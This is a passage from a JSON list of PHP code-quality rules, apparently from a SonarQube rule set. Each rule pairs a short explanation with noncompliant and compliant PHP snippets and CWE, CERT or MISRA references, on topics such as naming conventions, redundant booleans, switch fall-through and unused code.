same name as class fields","htmlDesc":"<p>Shadowing fields with a local variable is a bad practice that reduces code readability: it makes it confusing to know whether the field or the\nvariable is being used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n  public $myField;\n\n  public function doSomething() {\n    $myField = 0;\n    ...\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/2ADEAw\">CERT, DCL51-J.<\/a> - Do not shadow or obscure identifiers in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S112","repo":"php","name":"Generic exceptions ErrorException, RuntimeException and Exception should not be thrown","htmlDesc":"<p>If you throw a general exception type, such as ErrorException, RuntimeException, or Exception in a 
library or framework, it forces consumers to\ncatch all exceptions, including unknown exceptions that they do not know how to handle.<\/p>\n<p>Instead, either throw a subtype that already exists in the Standard PHP Library, or create your own type that derives from Exception.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthrow new Exception();  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nthrow new InvalidArgumentException();\n\/\/ or\nthrow new UnexpectedValueException();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/397.html\">MITRE, CWE-397<\/a> - Declaration of Throws for Generic Exception <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/BoB3AQ\">CERT, ERR07-J.<\/a> - Do not throw RuntimeException, Exception, or Throwable\n  <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1124","repo":"php","name":"Modifiers should be declared in the correct order","htmlDesc":"<p>The PSR2 standard recommends listing modifiers in the following order to improve the readability of PHP source code:<\/p>\n<ol>\n  <li> final or abstract <\/li>\n  <li> public or protected or private <\/li>\n  <li> static <\/li>\n<\/ol>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstatic protected $foo;\n...\npublic static final function bar(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprotected static $foo;\n...\nfinal public static function bar(){...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1125","repo":"php","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($booleanVariable == true) { \/* ... *\/ }\nif ($booleanVariable != true) { \/* ... *\/ }\nif ($booleanVariable || false) { \/* ... 
*\/ }\ndoSomething(!false);\n\n$booleanVariable = condition ? true : exp;\n$booleanVariable = condition ? false : exp;\n$booleanVariable = condition ?  exp : true;\n$booleanVariable = condition ?  exp : false;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($booleanVariable) { \/* ... *\/ }\nif (!$booleanVariable) { \/* ... *\/ }\nif ($booleanVariable) { \/* ... *\/ }\ndoSomething(true);\n\n$booleanVariable = condition || exp;\n$booleanVariable = !condition &amp;&amp; exp;\n$booleanVariable = !condition ||  exp;\n$booleanVariable = condition &amp;&amp; exp;\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1126","repo":"php","name":"Return of boolean expressions should not be wrapped into an \"if-then-else\" statement","htmlDesc":"<p>Return of boolean literal statements wrapped into <code>if-then-else<\/code> ones should be simplified.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (expression) {\n  return true;\n} else {\n  return false;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nreturn expression;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S113","repo":"php","name":"Files should contain an empty new line at the end","htmlDesc":"<p>Some tools such as Git work better when files end with an empty line.<\/p>\n<p>This rule simply generates an issue if it is missing.<\/p>\n<p>For example, a Git diff looks like this if the empty line is missing at the end of the file:<\/p>\n<pre>\n+class Test {\n+}\n\\ No newline at end of file\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1131","repo":"php","name":"Lines should not end with trailing whitespaces","htmlDesc":"<p>Trailing whitespaces are simply useless and should not stay 
in code. They may generate noise when comparing different versions of the same\nfile.<\/p>\n<p>If you encounter issues from this rule, this probably means that you are not using an automated code formatter - which you should if you have the\nopportunity to do so. <\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1134","repo":"php","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide($numerator, $denominator) {\n  return $numerator \/ $denominator;              \/\/ FIXME denominator value might be  0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1135","repo":"php","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n  \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment 
<\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S114","repo":"php","name":"Interface names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all\ninterface names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\ninterface myInterface {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ninterface MyInterface {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the interface names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1142","repo":"php","name":"Functions should not contain too many return statements","htmlDesc":"<p>Having too many return statements in a function increases the function's essential complexity because the flow of execution is broken each time a\nreturn statement is encountered. 
This makes it harder to read and understand the logic of the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction myFunction(){ \/\/ Noncompliant as there are 4 return statements\n  if (condition1) {\n    return true;\n  } else {\n    if (condition2) {\n      return false;\n    } else {\n      return true;\n    }\n  }\n  return false;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed return statements per function","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1144","repo":"php","name":"Unused \"private\" methods should be removed","htmlDesc":"<p><code>private<\/code> methods that are never executed are dead code: unnecessary, inoperative code that should be removed. Cleaning out dead code\ndecreases the size of the maintained codebase, making it easier to understand the program and preventing bugs from being introduced.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo\n{\n  private function Foo() {}   \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n  public static function doSomething()\n  {\n    $foo = new Foo();\n    ...\n  }\n\n  private function unusedPrivateFunction() {  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo\n{\n  private function Foo(){}   \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n  public static function doSomething()\n  {\n    $foo = new Foo();\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1145","repo":"php","name":"Useless \"if(true) {...}\" and \"if(false){...}\" blocks should 
be removed","htmlDesc":"<p><code>if<\/code> statements with conditions that are always false have the effect of making blocks of code non-functional. <code>if<\/code>\nstatements with conditions that are always true are completely redundant, and make the code less readable.<\/p>\n<p>There are three possible causes for the presence of such code: <\/p>\n<ul>\n  <li> An if statement was changed during debugging and that debug code has been committed. <\/li>\n  <li> Some value was left unset. <\/li>\n  <li> Some logic is not doing what the programmer thought it did. <\/li>\n<\/ul>\n<p>In any of these cases, unconditional <code>if<\/code> statements should be removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (true) {  \/\/ Noncompliant\n  doSomething();\n}\n...\nif (false) {  \/\/ Noncompliant\n  doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomething();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571.html\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S115","repo":"php","name":"Constant names should comply with a naming convention","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. 
This rule checks that all constant names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$<\/code>:<\/p>\n<pre>\ndefine(\"const1\", true);\n\nclass Foo {\n    const const2 = \"bar\";\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndefine(\"CONST1\", true);\n\nclass Foo {\n    const CONST2 = \"bar\";\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the constant names against.","defaultValue":"^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1151","repo":"php","name":"\"switch case\" clauses should not have too many lines","htmlDesc":"<p>The <code>switch<\/code> statement should be used only to clearly define some new branches in the control flow. As soon as a <code>case<\/code>\nclause contains too many statements this highly decreases the readability of the overall control flow statement. 
In such case, the content of the\n<code>case<\/code> clause should be extracted into a dedicated method.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a threshold of 5:<\/p>\n<pre>\nswitch ($var) {\n  case 0:  \/\/ 6 lines till next case\n    methodCall1();\n    methodCall2();\n    methodCall3();\n    methodCall4();\n    break;\n  default:\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($var) {\n  case 0:\n    doSomething();\n    break;\n  default:\n    break;\n}\n\nfunction doSomething(){\n  methodCall1(\"\");\n  methodCall2(\"\");\n  methodCall3(\"\");\n  methodCall4(\"\");\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of lines","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S116","repo":"php","name":"Field names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that field\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass MyClass {\n  $my_field;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n  $myField;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the field names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S117","repo":"php","name":"Local variable and function parameter names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. 
This rule allows to check that all local\nvariable and function parameter names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\npublic function doSomething($my_param){\n  $LOCAL;\n  ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function doSomething($myParam){\n  $local;\n  ...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1172","repo":"php","name":"Unused function parameters should be removed","htmlDesc":"<p>Unused parameters are misleading. Whatever the value passed to such parameters is, the behavior will be the same.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething($a, $b) { \/\/ \"$a\" is unused\n  return compute($b);\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($b) {\n  return compute($b);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Functions in classes that override a class or implement interfaces are ignored.<\/p>\n<pre>\nclass C extends B {\n\n  function doSomething($a, $b) {     \/\/ no issue reported on $b\n    compute($a);\n  }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 0-1-11 - There shall be no unused parameters (named or unnamed) in nonvirtual functions. 
<\/li>\n  <li> MISRA C:2012, 2.7 - There should be no unused parameters in functions <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1185","repo":"php","name":"Overriding methods should do more than simply call the same method in the super class","htmlDesc":"<p>Overriding a method just to call the same method from the super class without performing any other actions is useless and misleading. The only time\nthis is justified is in <code>final<\/code> overriding methods, where the effect is to lock in the parent class behavior. This rule ignores such\noverrides of <code>equals<\/code>, <code>hashCode<\/code> and <code>toString<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Child extends Parent {\n\n  public function func($n,$m) {\n    parent::func($n$m);  \/\/ Noncompliant\n  }\n}\n\nclass Parent {\n  public function func($n, $m) {\n    \/\/ do something\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Child extends Parent {\n\n  public function func($n,$m) {\n    parent::func($n$m);\n    \/\/ do additional things...\n  }\n}\n\nclass Parent {\n  public function func($n, $m) {\n    \/\/ do something\n  }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nclass Child extends Parent {\n  \/\/ function eliminated\n}\n\nclass Parent {\n  public function func($n, $m) {\n    \/\/ do something\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1192","repo":"php","name":"String literals should not be duplicated","htmlDesc":"<p>Duplicated string literals make the process of refactoring error-prone, since you must be sure 
to update all occurrences.<\/p>\n<p>On the other hand, constants can be referenced from many places, but only need to be updated in a single place.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction run() {\n  prepare('action1');                              \/\/ Non-Compliant - 'action1' is duplicated 3 times\n  execute('action1');\n  release('action1');\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst ACTION_1 = 'action1';\n\nfunction run() {\n  prepare(ACTION_1);\n  execute(ACTION_1);\n  release(ACTION_1);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>To prevent generating some false-positives, literals having fewer than 5 characters are excluded.<\/p>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"threshold","htmlDesc":"Number of times a literal must be duplicated to trigger an issue","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1200","repo":"php","name":"Classes should not be coupled to too many other classes (Single Responsibility Principle)","htmlDesc":"<p>According to the Single Responsibility Principle, introduced by Robert C. 
Martin in his book \"Principles of Object Oriented Design\", a class should\nhave only one responsibility:<\/p>\n<blockquote>\n  <p>If a class has more than one responsibility, then the responsibilities become coupled.<\/p>\n  <p>Changes to one responsibility may impair or inhibit the class' ability to meet the others.<\/p>\n  <p>This kind of coupling leads to fragile designs that break in unexpected ways when changed.<\/p>\n<\/blockquote>\n<p>Classes which rely on many other classes tend to aggregate too many responsibilities and should be split into several smaller ones.<\/p>\n<p>Nested class dependencies are not counted as dependencies of the outer class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n  class Foo {            \/\/ Noncompliant - Foo depends on too many classes: T1, T2, T3, T4, T5, T6 and T7\n    \/**\n     * @var T1\n     *\/\n    public $a1;          \/\/ Foo is coupled to T1\n    \/**\n     * @var T2\n     *\/\n    protected $a2;       \/\/ Foo is coupled to T2\n    \/**\n     * @var T3\n     *\/\n    private $a3;         \/\/ Foo is coupled to T3\n\n    \/**\n     * @param T5 $a\n     * @param T6 $b\n     *\n     * @return T4\n     *\/\n    public function compute(T5 $a, $b) { \/\/ Foo is coupled to T4, T5 and T6\n      $result = new T7();     \/\/ Foo is coupled to T7\n      return $result;\n    }\n  }\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of classes a single class is allowed to depend upon","defaultValue":"20","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S121","repo":"php","name":"Control structures should use curly braces","htmlDesc":"<p>While not technically incorrect, the omission of curly braces can be misleading, and may lead to the introduction of errors during maintenance.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ the two statements seem to be attached to the if statement, but that is only true for the first one:\nif (condition)\n  
executeSomething();\n  checkSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) {\n  executeSomething();\n  checkSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.8 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n  <li> MISRA C:2004, 14.9 - An if (expression) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n  compound statement, or another if statement <\/li>\n  <li> MISRA C++:2008, 6-3-1 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n  <li> MISRA C++:2008, 6-4-1 - An if (condition) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n  compound statement, or another if statement <\/li>\n  <li> MISRA C:2012, 15.6 - The body of an iteration-statement or a selection-statement shall be a compound-statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1QGMAg\">CERT, EXP19-C.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S122","repo":"php","name":"Statements should be on separate lines","htmlDesc":"<p>For better readability, do not put more than one statement on a single line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(someCondition) doSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(someCondition) {\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Anonymous functions containing a single statement are ignored.<\/p>\n<pre>\n$max_comparator = function ($v) { return $v &gt; 2; };           \/\/ Compliant\n$max_comparator = 
function ($v) { echo $v; return $v &gt; 2; };  \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S125","repo":"php","name":"Sections of code should not be \"commented out\"","htmlDesc":"<p>Programmers should not comment out code as it bloats programs and reduces readability.<\/p>\n<p>Unused code should be deleted and can be retrieved from source control history if required.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 2.4 - Sections of code should not be \"commented out\". <\/li>\n  <li> MISRA C++:2008, 2-7-2 - Sections of code shall not be \"commented out\" using C-style comments. <\/li>\n  <li> MISRA C++:2008, 2-7-3 - Sections of code should not be \"commented out\" using C++ comments. <\/li>\n  <li> MISRA C:2012, Dir. 4.4 - Sections of code should not be \"commented out\" <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S126","repo":"php","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. 
This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n  do_something();\n} else if (condition2) {\n  do_something_else();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1) {\n  do_something();\n} else if (condition2) {\n  do_something_else();\n} else {\n  throw new InvalidArgumentException('message');\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n  <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n  <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1264","repo":"php","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, but the init and increment expressions are missing, a <code>while<\/code>\nloop should be used instead to increase readability. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S127","repo":"php","name":"\"for\" loop stop conditions should be invariant","htmlDesc":"<p>A <code>for<\/code> loop stop condition should test the loop counter against an invariant value (i.e. one that is true at both the beginning and\nending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins. <\/p>\n<p>Stop conditions that are not invariant are slightly less efficient, as well as being difficult to understand and maintain, and likely lead to the\nintroduction of errors in the future.<\/p>\n<p>This rule tracks three types of non-invariant stop conditions:<\/p>\n<ul>\n  <li> When the loop counters are updated in the body of the <code>for<\/code> loop <\/li>\n  <li> When the stop condition depends upon a method call <\/li>\n  <li> When the stop condition depends on an object property, since such properties could change during the execution of the loop. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 10; $i++) {\n  echo $i;\n  if (condition) {\n    $i = 20;   \/\/ Noncompliant - the loop counter is modified in the body\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 10; $i++) {\n  echo $i;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.6 - Numeric variables being used within a <em>for<\/em> loop for iteration counting shall not be modified in the body of the\n  loop. <\/li>\n  <li> MISRA C++:2008, 6-5-3 - The <em>loop-counter<\/em> shall not be modified within <em>condition<\/em> or <em>statement<\/em>. 
<\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S128","repo":"php","name":"Switch cases should end with an unconditional \"break\" statement","htmlDesc":"<p>When the execution is not explicitly terminated at the end of a switch case, it continues to execute the statements of the following case. While\nthis is sometimes intentional, it often is a mistake which leads to unexpected behavior. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($myVariable) {\n  case 1:\n    foo();\n    break;\n  case 2:  \/\/ Both 'do_something()' and 'do_something_else()' will be executed. Is it on purpose?\n    do_something();\n  default:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($myVariable) {\n  case 1:\n    foo();\n    break;\n  case 2:\n    do_something();\n    break;\n  default:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule is relaxed in the following cases:<\/p>\n<pre>\nswitch ($myVariable) {\n  case 0:                  \/\/ Empty case used to specify the same behavior for a group of cases.\n  case 1:\n    do_something();\n    break;\n  case 2:                  \/\/ Use of continue statement (inside a switch, PHP treats continue like break)\n    continue;\n  case 3:                  \/\/ Case includes a jump statement (exit, return, break, etc.)\n    exit(0);\n  case 4:\n    echo 'This case intentionally falls through';\n    \/\/ no break        &lt;- comment is used when fall-through is intentional in a non-empty case body\n  default:                 \/\/ For the last case, use of break statement is optional\n    do_something_else();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C:2004, 15.2 - An unconditional break statement shall terminate every non-empty switch clause <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. 
<\/li>\n  <li> MISRA C++:2008, 6-4-5 - An unconditional throw or break statement shall terminate every non-empty switch-clause <\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n  <li> MISRA C:2012, 16.3 - An unconditional break statement shall terminate every switch-clause <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/484.html\">MITRE, CWE-484<\/a> - Omitted Break Statement in Switch <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YIFLAQ\">CERT, MSC17-C.<\/a> - Finish every set of statements associated with a case\n  label with a break statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZoFLAQ\">CERT, MSC18-CPP.<\/a> - Finish every set of statements associated with a case\n  label with a break statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ewHAAQ\">CERT, MSC52-J.<\/a> - Finish every set of statements associated with a case\n  label with a break statement <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1301","repo":"php","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($variable) {\n  case 0:\n    do_something();\n    break;\n  default:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($variable == 0) {\n  do_something();\n} else {\n  do_something_else();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n  <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. 
